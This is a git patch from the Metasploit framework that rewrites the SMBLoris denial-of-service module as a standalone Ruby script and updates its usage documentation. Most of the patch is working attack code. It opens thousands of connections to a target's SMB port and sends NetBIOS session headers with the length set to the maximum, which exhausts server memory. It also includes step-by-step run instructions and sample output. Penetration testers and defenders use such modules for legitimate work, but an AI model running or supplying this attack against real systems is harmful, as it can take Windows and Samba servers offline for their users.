From 5ece14b064dc143653d672fa646d23371ecb881c Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Fri, 23 Mar 2018 14:55:18 -0500 Subject: [PATCH] Convert SMBLoris to an external module --- .../modules/auxiliary/dos/smb/smb_loris.md | 21 +-- modules/auxiliary/dos/smb/smb_loris.rb | 176 +++++++++--------- 2 files changed, 100 insertions(+), 97 deletions(-) mode change 100644 => 100755 modules/auxiliary/dos/smb/smb_loris.rb diff --git a/documentation/modules/auxiliary/dos/smb/smb_loris.md b/documentation/modules/auxiliary/dos/smb/smb_loris.md index b52819fde6..ed8d607b4c 100644 --- a/documentation/modules/auxiliary/dos/smb/smb_loris.md +++ b/documentation/modules/auxiliary/dos/smb/smb_loris.md @@ -3,7 +3,7 @@ This module exploits a vulnerability in the NetBIOS Session Service Header for SMB. Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable. See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability. - + The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target. @@ -14,7 +14,7 @@ 1. Start msfconsole 1. Do: `use auxiliary/dos/smb/smb_loris` - 1. Do: `set RHOST [IP]` + 1. Do: `set rhost [IP]` 1. Do: `run` 1. Target should allocate increasing amounts of memory. @@ -30,14 +30,11 @@ msf auxiliary(smb_loris) > msf auxiliary(smb_loris) > run -[*] 192.168.172.138:445 - Sending packet from Source Port: 1025 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1026 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1027 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1028 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1029 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1030 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1031 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1032 -[*] 192.168.172.138:445 - Sending packet from Source Port: 1033 -.... +[*] Starting server... +[*] 192.168.172.138:445 - 100 socket(s) open +[*] 192.168.172.138:445 - 200 socket(s) open +... +[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits. +[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open +... ``` diff --git a/modules/auxiliary/dos/smb/smb_loris.rb b/modules/auxiliary/dos/smb/smb_loris.rb old mode 100644 new mode 100755 index 3d70ce4122..10856b1294 --- a/modules/auxiliary/dos/smb/smb_loris.rb +++ b/modules/auxiliary/dos/smb/smb_loris.rb @@ -1,89 +1,95 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## +#!/usr/bin/env ruby + +require 'socket' +require 'metasploit' require 'bindata' -require 'ruby_smb' - -class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos - - class NbssHeader < BinData::Record - endian :little - uint8 :message_type - bit7 :flags - bit17 :message_length - end - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SMBLoris NBSS Denial of Service', - 'Description' => %q{ - The SMBLoris attack consumes large chunks of memory in the target by sending - SMB requests with the NetBios Session Service(NBSS) Length Header value set - to the maximum possible value. By keeping these connections open and initiating - large numbers of these sessions, the memory does not get freed, and the server - grinds to a halt. This vulnerability was originally disclosed by Sean Dillon - and Zach Harding. - - DISCALIMER: This module opens a lot of simultaneous connections. Please check - your system's ULIMIT to make sure it can handle it. This module will also run - continuously until stopped. - }, - 'Author' => - [ - 'thelightcosine' - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'http://smbloris.com/' ] - ], - 'DisclosureDate' => 'Jul 29 2017' - )) - - register_options( - [ - Opt::RPORT(445) - ]) - end - - def run - header = NbssHeader.new - header.message_length = 0x01FFFF - - linger = Socket::Option.linger(true, 60) - - while true do - sockets = {} - (1025..65535).each do |src_port| - print_status "Sending packet from Source Port: #{src_port}" - opts = { - 'CPORT' => src_port, - 'ConnectTimeout' => 360 - } - - if sockets[src_port] - disconnect(sockets[src_port]) - end - - begin - nsock = connect(false, opts) - nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true) - nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5)) - nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10)) - nsock.setsockopt(linger) - nsock.write(header.to_binary_s) - sockets[src_port] = nsock - rescue ::Exception => e - print_error "Exception sending packet: #{e.message}" - end - end - end - - - end +class NbssHeader < BinData::Record + endian :little + uint8 :message_type + bit7 :flags + bit17 :message_length +end + +metadata = { + name: 'SMBLoris NBSS Denial of Service', + description: %q{ + The SMBLoris attack consumes large chunks of memory in the target by sending + SMB requests with the NetBios Session Service(NBSS) Length Header value set + to the maximum possible value. By keeping these connections open and initiating + large numbers of these sessions, the memory does not get freed, and the server + grinds to a halt. This vulnerability was originally disclosed by Sean Dillon + and Zach Harding. + + DISCALIMER: This module opens a lot of simultaneous connections. Please check + your system's ULIMIT to make sure it can handle it. This module will also run + continuously until stopped. + }, + authors: [ + 'thelightcosine', + 'Adam Cammack ' + ], + date: '2017-06-29', + references: [ + { type: 'url', ref: 'http://smbloris.com/' } + ], + type: 'dos', + options: { + rhost: {type: 'address', description: 'The target address', required: true, default: nil}, + rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445}, + } +} + +def run(args) + header = NbssHeader.new + header.message_length = 0x01FFFF + + last_reported = 0 + warned = false + n_loops = 0 + sockets = [] + + target = Addrinfo.tcp(args[:rhost], args[:rport].to_i) + + Metasploit.logging_prefix = "#{target.inspect_sockaddr} - " + + while true do + begin + sockets.delete_if do |s| + s.closed? + end + + nsock = target.connect(timeout: 360) + nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true) + nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5)) + nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10)) + nsock.setsockopt(Socket::Option.linger(true, 60)) + nsock.write(header.to_binary_s) + sockets << nsock + + n_loops += 1 + if last_reported != sockets.length + if n_loops % 100 == 0 + last_reported = sockets.length + Metasploit.log "#{sockets.length} socket(s) open", level: 'info' + end + elsif n_loops % 1000 == 0 + Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info' + end + rescue Interrupt + break + sockets.each &:close + rescue Errno::EMFILE + Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned + warned = true + sockets.slice(0).close + rescue Exception => e + Metasploit.log "Exception sending packet: #{e.message}", level: 'error' + end + end +end + +if __FILE__ == $PROGRAM_NAME + Metasploit.run(metadata, method(:run)) end